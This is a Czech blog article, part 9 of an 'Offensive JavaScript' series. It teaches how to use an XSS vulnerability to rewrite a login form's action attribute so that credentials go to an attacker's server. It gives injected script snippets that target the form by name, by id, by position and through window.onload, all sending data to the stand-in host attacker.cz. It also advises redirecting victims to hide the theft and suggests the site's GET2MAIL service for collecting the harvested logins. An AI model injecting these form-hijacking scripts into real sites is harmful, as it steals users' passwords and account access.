Zpět na seznam článků     Číst komentáře (3)     Verze pro tisk

Útočný JavaScript (9)

Autor: .cCuMiNn.   
3.3.2011

Zneužitím XSS zranitelnosti je mimo jiné možné provést také změnu atributu action u legitimních přihlašovacích formulářů. Díky tomu mají útočníci možnost zjistit naprosto jednoduchým způsobem přihlašovací údaje uživatelů.


Hned na začátku uvedu příklad HTML kódu jednoduchého přihlašovacího formuláře, aby si i ti méně znalí mohli udělat představu, o čem to vlastně dále budu psát.


 1. <form id="loginForm" name="loginForm" method="post" action="./login.php">
 2.   <label for="jmeno">Jméno:</label>
 3.   <input type="text" id="jmeno" name="jmeno"><br>
 4.   <label for="heslo">Heslo:</label>
 5.   <input type="password" id="heslo" name="heslo"><br>
 6.   <input type="submit" value="Přihlásit">
 7. </form>

Uvedený formulář očekává zadání uživatelského jména a hesla. Tyto údaje pak po stisku tlačítka "Přihlásit" odešle metodou POST skriptu login.php, který se nachází ve stejném adresáři jako samotná webová stránka. Tento cíl je přitom definován v atributu action u prvku form.

Ve chvíli, kdy se podaří na webovou stránku propašovat skrz XSS zranitelnost kód JavaScriptu, může útočník jednoduše změnit obsah atributu action a tím docílit odeslání přihlašovacích údajů na svůj server, který tyto údaje zaznamená. Podoba atributu action ve formuláři by po změně byla například takováto: action="http://www.attacker.cz/saveLogin.php".

Vlastní obsah útočného skriptu přitom může mít různé podoby, podle toho, které atributy jsou u prvku form uvedeny. Z těch, které jsou pro nás důležité, to mohou být atributy id a name. Mohou být samozřejmě uvedeny oba, pouze jeden z nich, nebo dokonce ani jeden z nich. Na základě toho, který z atributů je uveden zvolíme odpovídající postup při "zaměřování" formuláře v našem skriptu.

Zacílení formuláře podle atributu name

Obsahuje-li prvek form atribut name přistoupíme k obsahu atributu action skrz jeho jméno takto:


 1. <script>
 2.   document.loginForm.action="http://www.attacker.cz/saveLogin.php";
 3. </script>

Zacílení formuláře podle atributu id

Obsahuje-li prvek form atribut id přistoupíme k obsahu atributu action skrz jeho id takto:


 1. <script>
 2.   document.getElementById("loginForm").action="http://www.attacker.cz/saveLogin.php";
 3. </script>

Zacílení formuláře podle jeho pořadí v dokumentu

Neobsahuje-li prvek form ani jeden z uvedených atributů, nezbývá než k jeho obsahu přistoupit prostřednictvím umístění formuláře v dokumentu. Objekt document obsahuje vlastnost forms, která vrací pole všech formulářů umístěných v daném HTML dokumentu. Stejného výsledku bychom dosáhli také použitím metody getElementByTagName("form") objektu document. Jednotlivé prvky pole jsou indexovány od nuly a pokud tedy chceme přistoupit k prvnímu formuláři v dokumentu, nalezneme jej pod indexem 0. Pro přistup k formuláři skrz jeho pořadí můžeme tedy použít tento kód:


 1. <script>
 2.   document.forms[0].action="http://www.attacker.cz/saveLogin.php";
 3. </script>

Umístění injektovaného skriptu

Uvedené postupy je možné využít pouze ve chvíli, kdy je námi injektovaný skript načítán až po té, co je načten samotný formulář. V opačném případě, kdy by byl nejprve načten náš skript a teprve následně by se načítal kód formuláře, by při běhu injektovaného skriptu došlo k chybě, protože by se pokoušel přistupovat k objektu, který v té době ještě neexistuje. V takovém případě, je nutné odložit provedení akce až do chvíle, kdy dojde k načtení celého dokumentu.

Toto odložení akce není žádnou složitou záležitostí. Ke spuštění útočné části kódu pouze využijeme událost onLoad objektu window. K této událsti dojde ve chvíli, kdy je celý dokument načten a skriptu tedy již nic nebrání v přístupu k vlastnímu přihlašovacímu formuláři.


 1. <script>
 2.   window.onload = function() {document.loginForm.action="http://www.attacker.cz/saveLogin.php"};
 3. </script>

Ukládání získaných dat na straně útočníka

Ve chvíli, kdy přihlašovací údaje dorazí na stranu útočníka, je zapotřebí již jen tyto údaje uložit do databáze (do souboru) nebo si je nechat zaslat například e-mailovou zprávou. Pro zamaskování útoku je pak ještě vhodné přesměrovat uživatele společně se zadanými údaji do aplikace, k níž se pokoušel přihlásit.

Samozřejmě bych i zde mohl uvádět zdrojové kódy k tomu sloužící, nicméně není nic jednoduššího než využít zdejšího projektu GET2MAIL, který se o všechny tyto kroky prováděné na straně útočníka postará. Stačí si jen nechat projektem vygenerovat své jedinečné ID a to použít v adrese, kterou použijete při změně atributu action formuláře.


Líbil se Vám článek?
Budeme potěšeni, pokud vás zaujme také reklamní nabídka

Social Bookmarking

     

Hodnocení/Hlasovalo: 1.53/15

1  2  3  4  5    
(známkování jako ve škole)